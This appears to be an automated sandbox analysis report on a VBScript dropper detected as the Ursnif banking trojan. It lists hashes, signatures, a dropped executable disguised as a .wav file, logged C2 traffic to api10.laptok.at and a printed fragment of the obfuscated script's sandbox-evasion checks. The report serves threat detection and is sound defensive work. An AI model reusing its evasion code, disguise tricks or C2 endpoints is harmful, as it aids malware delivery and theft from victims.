Analysis Report 1lfVu8BW8Kpg.vbs

Overview

General Information

Sample Name: 1lfVu8BW8Kpg.vbs
Analysis ID: 283794
MD5: e2da82911b3e14112c6f5ab4a125c621
SHA1: a2d7c88df9876d4bbc12988ff14f748beaed51ee
SHA256: fe880e2a4901242e0b99343a940fee1fa543bcdd5eed258992ccf50bdea56ae6

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\titanium.wav Virustotal: Detection: 13%
Multi AV Scanner detection for submitted file
Source: 1lfVu8BW8Kpg.vbs Virustotal: Detection: 16%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: global traffic HTTP traffic detected: GET /api1/u_2Bstkw2Pz/SaYhmzqOSt84p_/2BLY1CxLCjamdhOPavxrT/cqEWnAGVcBeGq1uG/O7_2Bv1QXcln_2B/xuaySYH_2Fps0rwQAp/FDAwoOiTk/tPzxwzHkr4b9YWEY1MCO/GqWrOmT_2BMC_2FT8ej/Tm7pQHOpFvHinuaxqlva0V/2CXadPPD8vplI/mtS1FcuC/HhFtVWcYwfZmwsp9Z2yxxD7/GUeRdMN_2B/rXdMHXXN0GRlYk_2F/nmeGwKPwmRse/kEKu47fQ3zo/bx6Ci7Cz0cI_0A/_0DqGgxnJwDU6Oz_2BaCA/eakON4i3FQP_2F3F/6TXS3gN_2/FvyQn33x/a3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/2zG9CTXIjdzG6KKQ2Y/ciuUx9Cmx/LUg0lwdHO9cur1stRR4e/U_2Bidr1JZpa5hYruON/OUZHKpA4IQrVlLIccCKvY1/lmfS8erKXJ5CR/B1t19lDo/m2GBPfFF2Olj23_2FHMe6KT/lNJ_2Bxxlu/vh7nFU6b6CC3XZcko/sLCq2GebDl39/UKUprxF4Zfq/3s5sxverfggbx3/tvTk4PhC_2FOuwfc7PW0N/gA_2BOcpk0uenKQ_/2BYbOao_2FTiGt2/DxmKDNr58Xv8PwhsTv/_0A_0DiU5/dNj_2FrjqLKvjpYYB7jD/UrWooKA64wccmXnhV07/dy8AnKxbIwggo_2FGzcqCg/xyodxOTN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x05247c79,0x01d68765</date><accdate>0x05247c79,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x05247c79,0x01d68765</date><accdate>0x05247c79,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052940ce,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.21.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x052940ce,0x01d68765</date><accdate>0x052ba320,0x01d68765</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Sep 2020 02:24:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.21.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.21.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.21.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.21.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.21.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.21.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.21.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.21.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.355881539.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355828611.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355999775.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355984560.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355946327.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355965105.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355920911.0000000005E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.355860552.0000000005E08000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Java / VBScript file with very long strings (likely obfuscated code)
Source: 1lfVu8BW8Kpg.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal92.troj.evad.winVBS@5/26@2/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\1lfVu8BW8Kpg.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1lfVu8BW8Kpg.vbs Virustotal: Detection: 16%
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7088 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7088 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 1lfVu8BW8Kpg.vbs Static file information: File size 1075883 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: wscript.exe, 00000000.00000003.199151237.0000017039D13000.00000004.00000001.sdmp, titanium.wav.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(((5594 - 126.0) - ((856 - 829.0) + 5439.0))) + "\")End FunctionFunction Maloney726()REM Shakespeare terbium tenacity hydrophobic304 Parsifal grandstand limpid pentane desire graveyard, radon477 posture Scotsman parenthesis showcase mode Tenneco whitewash Duquesne irate385 swift, yogi sociable nourish genii tutorial cheeky scold myeloid debase resorcinol, Andean704 gauze Chautauqua millennia Osgood Grecian561 SC guano bottle Siberia Vermont jerky Wesley iodide Saigon, mundane onomatopoeic perturbate. 999886 convenient rarefy effluvia archaic hydrophobia perceptible Ababa opthalmology asylum heterostructure Macbeth pharmacist hallucinogen bismuth. irruption deprecate informal spoil on error resume nextIf (InStr(WScript.ScriptName, cStr(392018303)) > 0 And qGiDn = 0) ThenExit FunctionEnd IfwEomcCIC = (100 + (-((64 - 1.0) + (37 - 3.0))))Garrisonian = (872 - ((79 + (1263 - 405.0)) - 68.0))' invade nucleotide deduce sucrose upbraid inducible Gresham Morgan Medford debase160 oscilloscope cavemen cartoon200, 1955747 inalterable Budweiser playtime Blaine. 1073795 tether coat decorous lily armistice Jugoslavia booth211 landfill, shipload505 feeble933 Saxony proffer whither bestir reputation Edinburgh Leigh Norton afar thirteen Poisson Arturo anthropoid dad Stanford inappreciable embeddable quality sourberry councilmen shrilly David798 drum indisposition, eject embarrass stone statue kayo. 7629185 concision Tobago200 biology ninefold551 shant rotunda elegiac Houdaille circumspect scissor scoreboard, 6293835 Bauhaus salary adhesion planetesimal carport sooth betatron stash flexure fettle Bismark. 
7123853 odorous Tommie ore dyad indiscriminate Java commerce tear, 5119360 mommy sarcastic135 sentential If CreateObject("Scripting.FileSystemObject").GetFolder(UAiEPT).Files.Count < wEomcCIC Thenantiquated702REM familiar sheen671 fetal dreg248 keyboard Tammany Sullivan769 ideolect cannabis menarche economy Michelin insatiable fence pageant smite Brunswick wapiti brine clothesbrush Friedrich student Sutherland juggernaut45 Nadine contractual coastal Polynesia immense bombast usual toenail hypothesis ivy militarism livestock Swaziland bream, 5135256 coolheaded synthesis. afire nubile. told representative fixate Carolina incubus banter pet. leprosy disambiguate advance46 Gilligan addenda AZ Matthew suspect vertebral pushpin render tuba insipid propitious mukluk slept irreducible radii theft adopt retrovision dromedary bimodal Arden hardboiled brigantine madam motorcar osier. 823303 hying Amadeus drought room flatiron stink geocentric Asheville Yankton gs27 quinine rodent410 Dolan294 most sunshade censorial End IfSet anthropocentric124 = CreateObject("WScript.Shell")AHTdw = anthropocentric124.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(AHTdw).Files.Count < Garrisonian Then' tagging traipse carpetbagger sprinkle, 898734 Hertz

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\titanium.wav
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\titanium.wav

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\1lfvu8bw8kpg.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\titanium.wav
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5076 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: wscript.exe, 00000000.00000003.205656323.000001703BCF1000.00000004.00000001.sdmp Binary or memory string: LPIfn{rt0FgngvgHkng"WCkGRV"-"$eqemuwtg0|kr$."Vtwg
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.206867241.000001703BD7D000.00000004.00000001.sdmp Binary or memory string: 0UcxgVqHkng"WCkGRV"-"$eqemuwtg0|kr$."4
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.205543738.000001703E783000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.205656323.000001703BCF1000.00000004.00000001.sdmp Binary or memory string: Ugv"HXSpFd?rp{Cp0PcogUrceg*WCkGRV"-"$eqemuwtg0|kr$+0Kvgou*+
Source: wscript.exe, 00000000.00000002.230932031.000001703F140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: titanium.wav.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cocksure.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Remote Access Functionality:

Yara detected Ursnif